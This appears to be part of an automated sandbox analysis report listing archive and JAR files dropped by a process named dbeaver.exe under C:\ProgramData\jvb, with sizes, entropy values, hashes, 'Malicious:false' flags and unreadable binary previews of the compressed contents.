      Size (bytes):715634
      Entropy (8bit):7.946366735244705
      Encrypted:false
      SSDEEP:
      MD5:CA88BF6CCE7E059E65C78961F5C9210D
      SHA1:2B2568EC0BF95CEED41577AD562985E0EF0F4003
      SHA-256:99741EAD563A1AACB5E02C60C734C9888A102A98D8FABB87951EB6E4E4D490D6
      SHA-512:CCB07138FC52AC8E6E81364E9448FD6812F137EDE3C2C5A877E31C292D42DD7C53F929AFB5DCB5997A941D2F3AC62E1C0580AD4D0E67BCBB35F7205F4C39EC6D
      Malicious:false
      Reputation:unknown
      Preview:PK........E.eW................META-INF/MANIFEST.MF....J..|.f.....\..^%.s.../.........m..<.....L...u.*K.B.......f.zn....U..........U.f.:.....!....... ............m.8...O.p..1..Y.$..._.\~.J4S._........|.F.S+OB.yD^._\;.....m...b....].....4..........B|Y...n..a...?!.&..[.M.M^..#a.Uf&..E..N.>..e.m..SL.B.~X.>..$....AE..a...1C.W..i.?.........zU8.V.....u.......|1.4....&-.w.....l.).R;.!....~...1.4....~.Km...&n...i..`'..|....|_G......fz...}.....u..O.....G.$L3=.m&._..........Y.~.....L. +/......&O?.;..7.x.?..tZ.0.........:..(c~..&......$.?..m..Y.....f.~...t.IC......*............'...=....c9. ......6U....w.T...g3...../..O...+v^.~.K.fM..o.._............o..2.^..m.[.L.v....=....M.?...f..|.Na..,.....7Np..%2;s.2....U=........m.n...e......C.x...y.f._...vd....h...~..5M.......-7.......Y5.7....4_^._&b.EA}}.r...'.?~x...<....l.7...f..x....n6..I..f.~<.;4nv.d..7...w..J..t..?..1....{~~f.iz.K....$d..2fV~..o.o..........6n...?b....x;.m...me...'s>....~n...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):106470
      Entropy (8bit):7.95740008213775
      Encrypted:false
      SSDEEP:
      MD5:F86F026E3E76491221D1DE7B9527C293
      SHA1:59F5508818DCE0CFEDED0B9B7800BBB6B9C02C99
      SHA-256:2AD7DD852D33F29BBBEA47091A6C053342B894B8F381A776E0F363A484515F71
      SHA-512:221090713685A1286FEBFEC746D25CF9F2402CCBABF722D8F08B2A7331D304B372EEFACC75EC55B8915A14EE5B5B13294BF167C0094F4CD3FF6D914684865AD8
      Malicious:false
      Reputation:unknown
      Preview:PK..........HW................META-INF/MANIFEST.MF.XY....~.....w.nxd...~@E..7\.y..R .Z.(..).].i...y1P*..2..,e-p,.........'......h...Z..$k)...h,...'.....8.Y|7.......o....y.,.^.4..<..y.......%...s.....0<'......["*.IdbZ...k.......C09.\...%."..Ubh...i......rR....fN...4..]....~......0uL........4..tp..A.F!D.f..}....^.E.:x....9||x...L@.yV.....4..K.H....E...... ...>.<>.rk....\...}?.^.C..C...d...~.......{......D!......E`y..0.5.C8..=.).......I.h1H...>.....j.X.(....\..<m.=>H..Xa.-..q.5...:.E...M..F..3w.O"v..L:F.nm...K.E.X].....|.6Jt....W}..H...].%...9J..r-..H.^T.*.'S,....a..b....8..D...{U.QN..../.K.}..F...Vl?....U.b..0a.:.K......W.{..6...F..(D.9..tU........7|.....'.\.9.6...0...7..1..'.=.~.TJ.v.....;..s...kA|.nB.^.a....j..............a.....>n.FQ...4G|;%.....4..X......Sl./..^..E..I..e.....Y..$1f....F.Z.=.....v..W..o..y..P{._...A...W5..U..8......W..Y.,.W,..:.5..p..0E.Az|P.B..r.c...O....n....V....c6.x.IR.F.B.m.......G.......'.....P..6.......3...ZjyS@T.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):140422
      Entropy (8bit):7.895885307215594
      Encrypted:false
      SSDEEP:
      MD5:B8F63DB2F8A1BE415E191CCABF52E5D4
      SHA1:5AF57C8B8DC918EA89EE6FE7492798D7F7EB6A67
      SHA-256:4C84969CC7F2B49EF3F4D3417DAE30F4B3C3932F48B437DCB4142D168323A462
      SHA-512:DB8D944664EA8C2792925B7DC8CD8D84EA52DAAB83C44613F24FB8990B929E97B89CDE273D42CE3CF2C042B791E800FD455633D8843F815E692D5C05B69A6C2A
      Malicious:false
      Reputation:unknown
      Preview:PK.........DcW................META-INF/MANIFEST.MF.ZY..X........^...l.uG_.... ..w....Q6..~..U..5.....V......'...Q.....E.e..t.|.cZ....#.}zP.......G.(...9B?...Q.?....oXF]...1xT^d...^.-..|z.O..a.^.x}.w.....FV.#..Q^..8.Q......(@...C..a..A......y.....h. ..C0.E....P...WE.Se..7......E..o....x.W._..'/.&.A.7...s.w.'8....c}..../....%I.~v..4..}....J...k<B.&z....[].0*..{o=.u..?~.@..u.........N.$3+.hT...<.t......)......&*/..(......6........xG'..x......-?}...b..f..|].o.....N.(..M...`......K.;h......7~G...i.z...x2...]sx.^"b.............W....?....x.wP..{..(..~x.....S9......_.[..d.&*.4.i..{.k.q.Wp...s1.E).O.............%.}..^}Q.O_A|z.;....@p...AE.Q.....~.L..??|..t....C.%............}.^..~..."..>.....o}.j...s...O |.\9.....$d.!.?_.%.$......).uq......H.....$.........xV...Fm...C.'..A>rQ8.........H.........=..J4.......FB...A..j......0.F.XR..1..r..y.S.?.9......[..EL.)Ea/ET...#".....)-p........?.k8..'\...k.s.n.h.8;T.IG..v..z.Q.[@n.x.....;8.....0....!YW.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):203743
      Entropy (8bit):7.925138890594939
      Encrypted:false
      SSDEEP:
      MD5:100FA85252437656DB3166D806A9D0F6
      SHA1:3A3F66BC442D95EFF95BFC9377EAEC4604103307
      SHA-256:9C25358736DE4D163014994973D677862968F7B0CB4CB1ACE1C2466D1FD2F543
      SHA-512:F9F6D1297916674ECF0E478316A1315E05F012531A4A42D28FB9BD1DB7E934F990D27452EC79C2BA5E5E0CDD647CD980F7C87A4CCFAEEA1013C8A058E9843767
      Malicious:false
      Reputation:unknown
      Preview:PK......../DcW................META-INF/MANIFEST.MF.[I....;...q....nf.....b.$......@b..@...z:m.%K>wccAefUe~.eVYv.$......:)._.G..'...&..._d..._...cX}A.....O.6I..!.?.e..f... .....o".W..._..O...$?...~."M../.j...iR..cxh.....p..Mu.V'.6..Q...j....y..G....0.#....0..o.J....6O_?.....E.<h..w.?...U...MX.n...n9>~..^.z...OC>....7....J.<..~...%U.7I..u.5J.`.....&7..%......L...y....~{......v|...!..G.o...nST..._.|.7J.u..)w....%.....~..y.(.<.l.O....:.O.><o....YV..g.x.....a.....=..G...z.lyPTg_..c.....L.Mr<O.......oC>...=q..................-...}..s.......QO:.j4.+..($..oC..7J.i.h.1...r.7.........v..z....a~L."...d.O.GI...w....@......'5...FI......wd........(.I..........|.]7.....cS.....8o|...._.cD.g..L.y.xiHj../?..k.....;bz...../!.0}.?-...^|."..3...d...(.....}..k`...z.V~.....s?..~....6i..MS._.`|.[........q...9.....n....9^k.....5..._.K"@.@t.F_F`:.}...w.0.@gS.C.3...A. 8...7u.).......O.?.M..B..}.kH..j..f./S.^fi|..a..n}...t.|.....l.t.....Z..s.]..Rwj.t1..d.........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):177395
      Entropy (8bit):7.891897588162852
      Encrypted:false
      SSDEEP:
      MD5:7BE42E742183BD8C0BB15E37896D4EA5
      SHA1:2A81F1D1061F5F48E41D82C0B4B4084D64AE3055
      SHA-256:C88CF0F5CDCEE3E3D8F290BA6BBC26F05FF2A3ED4911BF2D2E77179474DD8B3E
      SHA-512:B24386D72C8918FAD1D23648D8D74F2FBBF8C69BFD8294BED079D5D11ABE61CAE3F88B167B1AF3B246F019B45961078C3B0AC2FB50E4F5A4D5DF5ACBBD943030
      Malicious:false
      Reputation:unknown
      Preview:PK........xFcW................META-INF/MANIFEST.MF.[I..H..;.....s...b.;.......$....,b.......U....\.B.Of>..,.AU.5AYEy...r...D.......}...d_......_........D..u.._......Y.%..(.Y$....N../.U$M.e.?.......}x#/.;.&QQ.;pj.,?.U.m....*.........*.w...(.b..c_.%..x/........+,R..I4.......?.i...W.vc;.1...>.e_..]5n....<.:.;.`.?/.........(.A....=....s..6r............r.......?.$.......o)......&.'.%........n.(y5...T.o..x..e.........w...d`w.....[J...$o../.._..g.(n...5<.(J...d..~...w.(c...Q.K.UW.5.A.w...0....Q..!.+...we..Q.....i.3....Z....[.~..g=.{....s~..7e...w..q^....=....../.Q].o....a...7.i..&.Q.......!..9Jz^r.T.w..GI/..~A.(i..q.?".^.(....> ...e.~...G....8.bZ....<KAV....m..|}.F..5..^....{.?.".:O...W9..g....1....z.......M..Q.-....A..qFEJ.G._.%B..q.....*.:....%...@......CxvI.5..#......Q...t1w.l.X.......}.s.?.....~.....@BO ...z.f..... ..3.g.E."..@.......D...F..<.....Q0..o_. .r...-..Kw.v.T....*........n..........G...q.."z.b.LM........9..4..x;
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):7500
      Entropy (8bit):7.397991136426253
      Encrypted:false
      SSDEEP:
      MD5:BE9D92C6058EF83B21014D025CE0DF93
      SHA1:BA6E22DBE586F5587A864703ACD88A7EC151FC99
      SHA-256:1D11F3D3C81EDCCDCE2B59C8CC3D2F60CED20A86744D639DC2C0CC525E7C3E4F
      SHA-512:4C8CA21F352C60C2B435B869CE9EA6565F6BAEDB47FD6C0EFB3F5D7707DE73089C18EA4A54EF64FE8A01E0D5454EA969F706055E544994A157FD03A11E0921D7
      Malicious:false
      Reputation:unknown
      Preview:PK........p.cX................META-INF/MANIFEST.MF.....R[o.0.~G..@H..i6.....vJ.V.T5.^.0.s V.f..d.~NH.h....9.;......w.....>.f.g.DC.....!.p.V...@.!..?..z..|A......w.l.mN.g..\.FZH...$u.\....v...at....@..)..g\.X..%.{..x..1.~F.L1^7...Yv.k._ .D...<<.^.... ?XxW}......X.r"v.......O)+&.a.;?..........9/{>.J(...y..&.?lJ.G2...]..UP..D...Y7.......]...F..q....fX..h..t&&.|2m>7.c'.FO......3n 9i..>..[%.....^...h#.......H.^Rx..$p.*..m..t.u.R.5...T......].6..kLW....)....iR.&5....$..dfg..C..$..0^.q...8.....8,.bY..2.+...$9...PK...#......h...PK........p.cX................META-INF/..PK..............PK........p.cX................org/..PK..............PK........p.cX................org/eclipse/..PK..............PK........p.cX................org/eclipse/equinox/..PK..............PK........p.cX................org/eclipse/equinox/internal/..PK..............PK........p.cX............&...org/eclipse/equinox/internal/security/..PK..............PK........p.cX............,...org/eclipse/equinox/int
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):118636
      Entropy (8bit):7.872749106106739
      Encrypted:false
      SSDEEP:
      MD5:BDD86F5FC6FC26134BD745416B6A9FA1
      SHA1:9D06A4CEE8D5374AE1E24C26495D5D5AE23E1158
      SHA-256:BCB3740093558F5C7F2E47EE5E639ED57A5C5AC7463FBD84F00F9F8987791F83
      SHA-512:C726B79811984EEDA446C05A9B77F83624B384ED29BCBDB64CB68E846A2D7A0BA990246371D08B77C25B69C033087C9C00BEE215330169DEB112C7F61A8DAD72
      Malicious:false
      Reputation:unknown
      Preview:PK.........LW................META-INF/MANIFEST.MF.ZI..L..wD........-.U.^0..(..x.7..AF....7.......M..y...9'K6c..yq..Y.'.ox.....Y...|..#..1...G.}#;.....[..s'9.....n..b'.w...'.........'....?..hud%.o.H.]........'U'.v..E.3..]..H.W...$^.@up..... q.'.p..X.;I..%G...+F..m.~c.gR..>.d..?.E....~\.,6.'^;fYx...Q...U.d.b...".e2?....P._.A........._SiI@J..R..01...-.8....~H...v..(.o....nP.)..nRx..R.J..f>t.......}.q...C..o~...H.R........}<......O.xL..e..I..o..>..8..{mV...g.|.@.8e.....}4...!.w.u......_..u...YA..."...N.S..W2.?k..7].ahA....(....5..J.v..g?.J......(...i..o....@..3...".o-..:.......V.....m.z]..|.#0..,he{........../4X.@...Av.m.q...a.n..u.O.!......q..s[...~...t.W..[.....[.)...Z5.VS..K.yJ...7.y.Sd..^.7\Mv....~..rj.$0....].j.Y...$.p...?TE.PiK8........-..~|u.j.G.._`aL"....A..~....%ef....~|...../~xE..?P.~.J..h.>..{ .....[.p...,._..89z...?.s....Z`....../D.W..4..>Mv.>M..6..Iu-s..;......./O.?r.>r.......C.B.3..@...;.?.~................k.Dw3C.1ixu5t.d.9"k...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):29491
      Entropy (8bit):7.877661740267906
      Encrypted:false
      SSDEEP:
      MD5:4B2FCBB6C432B62B087DDE343AE4B169
      SHA1:6A812B63E0A078563EABD007609C2708C90552FC
      SHA-256:897753DF3CE465A6E4CDCA5AEAAFECCAFC2A79E3C68A6D0456C8A8F553CFF5C7
      SHA-512:3E94BD4B95096B2413EC201D3240AEBEE70595FCCFFA22487C4EF784BF0C9FFA3AC357CAFD2A5ECA03E1BC4F30B74AD7D8E7ED50BD40777ACB1786FA1BE0603A
      Malicious:false
      Reputation:unknown
      Preview:PK..........3W................META-INF/MANIFEST.MF.UKs.8.....@Q..-....1)... ....&{.e.V.%#....G..<..d.s.,...?u.&.`.%\Z".`JZ...z...\..m.' C..a0..beMn......4vW..#(......4y.<B.&.D.U......bo#....<(.e.C.'HF........!..x.O.......a.}Q:+'..!."e...}""k.*gu...f.j.q.}C!....k..>&Gc.r..M....%..m.l..qi...........p#L....v. .~.).A..T.....G...'.W.....YX.q.|.(f4.b.$.E.......@ .I|........K!.:i...G..R...C..'.L....C.._..gT^E...F.H.."S.jW...2.).b*@_.?.F.....l.^;.z..3..6..y[.H..%.".U.....)...G...~.F.%.....)5.....0DR..a!..S.j$..K...(,.uRN#1iP.P7=....B#.w.C.d.At.<...(i....|.[..q.R....N^..Gz....h..".<hW..&..o....g.oWF.%t....\C.Gn.E.4....mj...:..ij..@.......g..Jg.i.CS..<W..v........UnF.]..I.n....qs....Ub....l.`.&`.u.'DQ.........P)T..{...W....`.0.I...s...g+.jN.i....x..w.?..z....J..z......?.....G?..f............F.OVV.V....F".L....?......e...L...h>..[e......y....j......is......}..e.....uc....@....f...$I..r..#..D-.><..#.#.1z.x.F..e...g|.....@^.....M.`./...j. ...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):50213
      Entropy (8bit):7.917349172692018
      Encrypted:false
      SSDEEP:
      MD5:A0251F2B5BDB4512A56D6887696AA45C
      SHA1:A1D6239CE3F90353297AA1807A183F16593DE447
      SHA-256:E2592968AA8ACA7D248B2C8F04A7FC2F592D84421EB5B870A7F98373FF103082
      SHA-512:A62F9B31A080FE4E179A68A83CE4BA19381F316DF5E2F27B2244A5939FAD02573F22B5ED4AF97202E544EC22086BEEC46E71DCCF6AA115C316811B3977351A43
      Malicious:false
      Reputation:unknown
      Preview:PK..........3W................META-INF/MANIFEST.MF.W[s.8.}OU....}b....I....CH \..|%d..|.$.._....0;[...mu.>}...=.c.QV. Bq.Ws. ......Y..m5..1.s..K.#.+.jj..a.*t.ua."....o...;`.!....[.....C.\@..A.....3.~...{..`....`.y..w\.8R....H..x'..$.E.X.tY/.J.'.}....[.r..[..k!.bl!.m.%...;.....9.?....8.w9..3D|.^HH..T..x<T?U..........B..5p~.-...l.9o...x....1.R{....G..g......a....gP...C$X...'...q.....wB..%.zf.Vs-.........)P..sQ..o.......?...o..8....#....&.W.X...C..SNW.~3.B..#..._%..k&....lY....=.K8..M0oxZ.=\B..\......`. .>..;.....`s0.BD........"|....O....2.>...?.|asr$...0r.?F.......G.2......v..#..<N.8.... .. ....c....Y5..1.6..(7".x.r.....8C.,6o.Ma.m.wd#.|.h5G.Wu0....iU...2Zp.<..\8....<qn.....=..7.....#.N..<.........0....j.*C..`.li%U.mI.@....PQYZ@.F.e..........h~.P<.|.)...M...]@...m..e....?-.............y'.-[.7C........j.@I.R.I.,...K.....w...j..fqG.+..o.!$R..[w.(Hl...I..-f]*...}..Y....k..!.8?H..GO..O}k.)Z.=..&fS.4..m.....a._.|..U..I#...:`d...T}..j!5.L..,j..m.....773..P.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1029088
      Entropy (8bit):7.898453324579933
      Encrypted:false
      SSDEEP:
      MD5:A46047C268350B1470C2550241E88ECB
      SHA1:47F3BFD4C7ADC2029719E6FBBA6A0713B1688E7E
      SHA-256:080A6FEDD24831D15D63A0E0B54263E1A3E5A3B76F67473DC687A24ACFAD5B59
      SHA-512:CD01D85EB2A92763FE2D7AB69902F21AAD4122F96D733741D15ECFBB31BC6CDAF148F15A06E750260CEFF3E80E7D00C08746E48DC60CABE24E12C46F8420C173
      Malicious:false
      Reputation:unknown
      Preview:PK........o.vW................META-INF/MANIFEST.MF....X.&.......9.n.3).....N..D'...H.{#..{....&.Rd.t"....n.e.d.q.7..g.n...?6....?..[............D.Fq.....@.O..8.~..w.......Z.e...o~.$............[.......1w.,v..)..........._.h."..v.......k_........\..f......,.qg.e.......;.......w.&....G....b...w_,];.'.}.L....P.u..l....<.....e.........?.....}/n+.n.z...}>c..../..G...?..1...~..x.y......>>.y5.i....?.?.~..~7+.........e.._........_...T.L....K.^x..=nv..g_.o.Lp.{........p........=....vy...w..~~~.....[....;.,.}_....nX_n.........-.x.yZ>[..../...gd}.Q.._..'..e../..l.y#v../..n.........'...6...k.......]..v.z...&v.,n...w..ol._.;+..Y.......;.5....g...?n$...y.E...O../"....z..._.?/..i.wY.....'..?.5../...u....-...../%..~.u.......G.;_.%SfO....q..m..........2.?~..[.......e...?.7.g.....j.....sg.../...~w3.ib.....*..~b....;..[......q.w|..........;.....@..".7.....B..(.0........kf6.?........vgk...........T...|...].>..p../..|...~E.o.f.*.W.....6....mO.."..t..<..X
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):4103
      Entropy (8bit):7.269013229520614
      Encrypted:false
      SSDEEP:
      MD5:0E1FEADAFA7474047D93A7D8D5B59E5B
      SHA1:FE1D7BBC6E6B89FE883292C22640D8EC0B658FFA
      SHA-256:87A483313BC40146631E9677B85A3BF873607273C133F3FE716293C34473EA81
      SHA-512:016FA611AB44AE24B796A35B69C9414A8C009DCF7BE410A9685D7498311E1A0ADC55B050DF2D2539C6F193ECFB5222D8EF37A6D18A9F9ADDBF37C73490C65289
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_es.properties}P.N. ........;k<....L...v........Z.`..03;....k.q.P+..V..Id.......&...u...+i.!....Ld..l....gz~...'jK..YH..f,o.5.....-B..wC..dS.{..8%@....6m....jZ.....s.B4....B..M...u.-.[..dv...X..G.{T....gX..........MN&.,..k.;..:.L......g./PK...w..........PK........k.cX................plugin_it.properties..Aj.0.@..b.{.t.).....A..LH....R.;q.=_...$o..I.m.1m.%ia7......&...u....|.\..2v.D!.9.#.>a..;.%.d......\."....}...\..*.;.,KK+...k..{Z.ReI}.Nz.o.e.h^....C<..=..z-8>nG..c.3..T...EK.fO..p.jWcp.%....8....o[..o..^.o....d..'..PK..'`..........PK........k.cX................plugin_zh.properties...j.0.E...A.q,G...U~.`....G......t....a...r.a.v^.Q;.K...].V....I6.....u.....z.a...s]-..1.y.nt.._Cf@.'...;=).`.!s...O....#<...z7.o].3...c.6....!...B..........g..]...o..d....k.r0...k..m..q.*..<.9.J.S...s....f...&.V...5G.4/{S.Z.4..W/.oPK..d.......!...PK........k.cX................plugin_de.properties}..N.0.D...K...........>.R.8C.........8..H..g..3.!NB
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):281244
      Entropy (8bit):7.9261124190373105
      Encrypted:false
      SSDEEP:
      MD5:B356A31D0DB061DC7BD55AFEE4298FCE
      SHA1:2460D3F4B9A5FE1F40AF4743274C465926AF3B60
      SHA-256:DD0850C7CEBE5401F525B3D5457FA6ACF58C74538967A90A4AFEB6465E9EE13D
      SHA-512:DF2B781391F8070BA713A68834AE4B7861C1C8F5CB7246CE4F6DEBC95CD0A0E392345AC17A63CF3D587901455FE7B7C8E5E8C69E340BE48BFE2E7FEDD086F13A
      Malicious:false
      Reputation:unknown
      Preview:PK.........fW................META-INF/MANIFEST.MF.{W..H............,J.X.H$%R........9g....`..Q.7..EvUWW=.Tuso...T...SVA....z....(..v./..O{.u.O....)?!O.'....M.._vv.E..kz...K...........F.....|'.......I.[_.......zy.+.'...r.......R/v.i......WQ...>. ... .@.8...(....U..Qg..?.i..?....g...H..K...Y..Nyx.6.YF..F..C..*..YY.9.Vdx.L.........$...?~..g]M.r.....&..n.F...i....."..~x.1..i...o.O.?.E.;..?....kOvf.q}rOV6]...$..^...'.".#..M..Je0]......?.5...-_.qK'{.B#..|a..g.....W.........n......^..n..I..J....A.w.........7#\,..yn*..Nz....T.b....K|.*_.~7.....v...q..o#...w...2....3.:...4.].y._.E.=.i. ...4....#.-d.....+#.....S4A.|yI..g.++....B$q.6_.I.......!O.....}.....d.?.z...)...W...^......A..A|A.z...q....1...*4Z....)7.j...ow..H+7+...M.'..}.S.T...H...!..c...C...~s.I..,.jE......Z*m.2K.._......w<.5.O....b.2.1....j.,..[_...|e%?:.._.."fMi9..:..ZN...J.../..../......#.^....F}..t.2..a..=M...........(...k.......Y....O.'.......p\..P../a.G...AQ.^..[..............{S......5.=Y.QMV
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):299304
      Entropy (8bit):7.834769155754707
      Encrypted:false
      SSDEEP:
      MD5:0BD3F0DA4D563AE6B22F16A9D469FFE0
      SHA1:4EA015100AA522507D1C480C7803B79C8EDB7F13
      SHA-256:FF41F609D2DA7F9204597F630EBA44B63B664273B8B7882D3F8B926322E92BD6
      SHA-512:5BB17DF1315F1736AE33BCB3B050F0ABB0ABE639C361145F02EC28E8A808EA460C87173D8050FDA0C5FD3C054994B41FFA2C269981AFF9C42CFF521C09D43672
      Malicious:false
      Reputation:unknown
      Preview:PK...........V................META-INF/MANIFEST.MF..W..Z.6x....::.\L.....}.0.......{#.....2..S.Jy..,.6K{.g....Y...V..YS.._.'..`..........).9..EwA...._.'.v.z....mX...Qp...}V.e...y.K"_..yU...._m9&Y}...o...2.^.h..S..Y.G.....O.7x~V.Y.|....a...A.......Q.B+....:l....Q...&..l..^i..?..m..O.../y..Oa.M..~q.?..o..........W..se.Eq.Eu.}...k..{.]..4.m..\w].....v..u.W]Wz..o...W...r.B...z...+..+3o.p.....g...........3K}....u..W..r.R.z.u..o.q....;R.......-...h.i...W..^.oD...q~U.....A?!....}.>A......J......z...u3}...j.;.+=xs.t..W..Qw..2..J.'.....JW..Q7...u....y+.+./?..._m.gF.......p.9....?..zgO....Tz...j..?.&....wT.{..O... .X..?...?I6.'......^.NG.....z...7.Mw../....1.t...ZoH......oR........-~..0.A.....d....%...b.j.....D...N.T.y....L.(.]....|.._.._..~.u.G.W.......2......A...J...j....]..Dp.O6K....Q..6#...A....{O.)..=q`....h...\A.}..o.y.. ..zu*...|.=........8TL..N..E.....V.<..M!(.^.o.pwg.6..S.)..J...7.p...$......<..MB.q....hd...}.{z}n].xxW>.+p.U..s4.(b.+...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):41010
      Entropy (8bit):7.567432499810084
      Encrypted:false
      SSDEEP:
      MD5:627ADF7E4E8C18E62AC83874F20C4BB8
      SHA1:5C3781F26DAD7F624E2B1423AA2FD1AA0451E7D4
      SHA-256:64409E825D542E00240F6D349F4CCEC7DE380E2A9400EAD0E7B7D402EC7D411B
      SHA-512:CF6A30A8B348524EEB48EFD2CAE3360362C68FE55EF6185E2E91C4A0E07242A0C8707F1C126C1FAC9942807FF8D44D1F181E94EB808AB51040D79CEB73E9A491
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_es.properties..1.. .....t.....1DMT.....W4m..@....&'l..b..3....*.*..T."...PK.....?...?...PK........k.cX............(...org/eclipse/jface/messages_es.properties.X]o.6.}. 0.O....u...I..I..Y.....k..Dj$..-..w.).r.w.....yyx?..wbf...&..N4..DiMpz........M..g.VrEuNe.[O.u...... ]VJSR]....w...{.....+....D.`....n...'.........re](&S.....v.dN..2..+c....D....H.......m.0..vY[O.$..~c..(H]CG~.k..{q...l....q.D.e..,.N...I{..d.....3.1.{...:.E).....h.)&...Z......b...7..7zX16...RL....eW._..L.....5|.E.h..j4@W.g.mk.k...=q..=....d)..y\.m...5.Y.\"'.-.{.6U1.jo3m.x.?....`._....*i...Q.!<.{6Q..u.=....5.3...PT...h...y/...HP....mG.D..)Z.p.......}QM.2...g.D....X...B......$=..[..,..y.........g..u..._.o@.P.*[.n......:[!x....Z;p.C..cI..98....~2"......G.'........8Ikr...E..Z..2^n..9.nza....B.B.*...\..-8.0*......}.`..6E.}-....|>.kt...}A_2..}.].&...x..2.KT.......I..........W}.. ...:.)._L..yo.|.....(r..r....<.c..<...9U.e....s.2>.q...1..[....}H..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):4197
      Entropy (8bit):6.495363931180829
      Encrypted:false
      SSDEEP:
      MD5:D9C92A88FBB635AD01005CBB4EB0800D
      SHA1:F2A1341407403D9350069583C09E19BEAA7A76B2
      SHA-256:1E3C779373B2CDA46E4ECBA9005D4935FCE2FFE4D333951892C513FD7B3C2EE6
      SHA-512:99BCAF15772EE08DD4C6012579127069FD781E6D117297398051FF58BD81B758102A6B3FB004956E04A332A6E18C48E4F9C7B20C3670C54B74805311B10CD01C
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_pt_BR.propertiesE.1.. ....W4q.].d\..`.$@.RM.........B..|......(..` BV....V....hI.3,...........PK...,.{Q...Y...PK........k.cX................plugin_it.properties..1.. ....W4q.]......!..*.{.o..v.!..~@qu@.....$m...Q..k.......!...BO:Q.Wp..|]....PK..;.[.U...\...PK........k.cX................plugin_es.properties..1.. .....t.....1DMT.....W4m..@....&'l..b..3....*.*..T."...PK.....?...?...PK........k.cX................plugin_ko.propertiesM... ....8h.h...A...........o.....I..(...\U....W.T.b.w.....u4,.NM....t...._PK.....4R...c...PK........k.cX................plugin_zh.properties..1..0.........B....b....'r...G.3....a..2.C.6816p.5..*.......^.X...r.S.A.7.....I......:M..6Q..Ce.=,...PK.....i...i...PK........k.cX............?...org/eclipse/jface/notifications/internal/messages_zh.properties}....0..w."..Z....Rp.....%I_..i^H^.......7.wkQ..<...5.Q.Ih..QE&.N"......TI.&.m..H.....{..N..j.H.A...2..J.l..c...:.rhgn2Y...O..._...1^.....{.o![6.l.\.L..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):33835
      Entropy (8bit):7.834620294909658
      Encrypted:false
      SSDEEP:
      MD5:522D276C9DD2BFF0BF7391D9A3A25A61
      SHA1:5F9BB149FD5B37D473D26DBE8260CA85A8BA25D7
      SHA-256:B0005E56C5420258AF7AADDB0A65DA3C1E84A9E5E84723F4F2148DB31CFAC704
      SHA-512:3D8A81EC9C5ACD7289555E392E3B82665E95FA51F9307986657B885578F8AD861A024AAD6C9E407AAF58BE6C5C04E9BA04A01D638AE322EEFAEDE4DBA6BFA118
      Malicious:false
      Reputation:unknown
      Preview:PK..........RW................META-INF/MANIFEST.MF.V..H.}.....c............x..(....Y.......'....7...s.dfU. B.LIc.q..Sc).....@...:5..0.......O.(..'%C......@..&^."7...9.kH..4.!...J..G..........9r!..:....3 O.._..)...9..1.)..(I!u....(&.C......3;..)..9..Y......^sx....ZB'..P...8.aD:5...R....2.1iL..............".q.......y 8.d.3.....0b7{....?..f...'..YDP...k..U..;..$..{.]....3S9W.\C7.8...C.b.90..R'...t..$i....}fW.B..O#...b|Y..._..Q........?.....=.U$..N.Z.6...W.!"...y.%..-86.....m..m.....-..n."....../..'L..LZ.S..C&oV.q.%....*.5....j.._.L..D.c..L..l...O..[.2.%..7..-.C..z...............j4...-..!..7.....g..=b{..ee".K.H.74..g..0.>...V.L..%Z........=u...L..`..)(=....L.-G(|Z[......-..........yOW..v...Ew...[.\..&...C..8....HoQ....|.....D]......5'.......,...W(.0M.....Vi....0M.....l\.[8@.3.$.;;..oW..........n.h.-.....e.V.h..;6........vC.Y...H.../.-"qw^....cA....$...o..z.{..M.a.lWo........Qr..>..m.9.[#P.6h.q....z<...~...n.z.....W...W.g.1A..vX.W..uz..h..a...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):86520
      Entropy (8bit):7.788788195481782
      Encrypted:false
      SSDEEP:
      MD5:C19D03E4D0E254C469AB58B30A11C951
      SHA1:8F011C54F187A7DA0157666FDE4694FDD2954487
      SHA-256:DDB46EF3FBDB14DED7ABB510890E248F6B3501054CA2FE03730DA8A5951450BC
      SHA-512:0C0EC8F9D19C1E94A1C2D98D3CC052CCB45219FEC035944D45A90287CF2077F02B665394CFFE70BE9CCC29C45A4C0CF430EC193E61C961AC692D6F626553D0CB
      Malicious:false
      Reputation:unknown
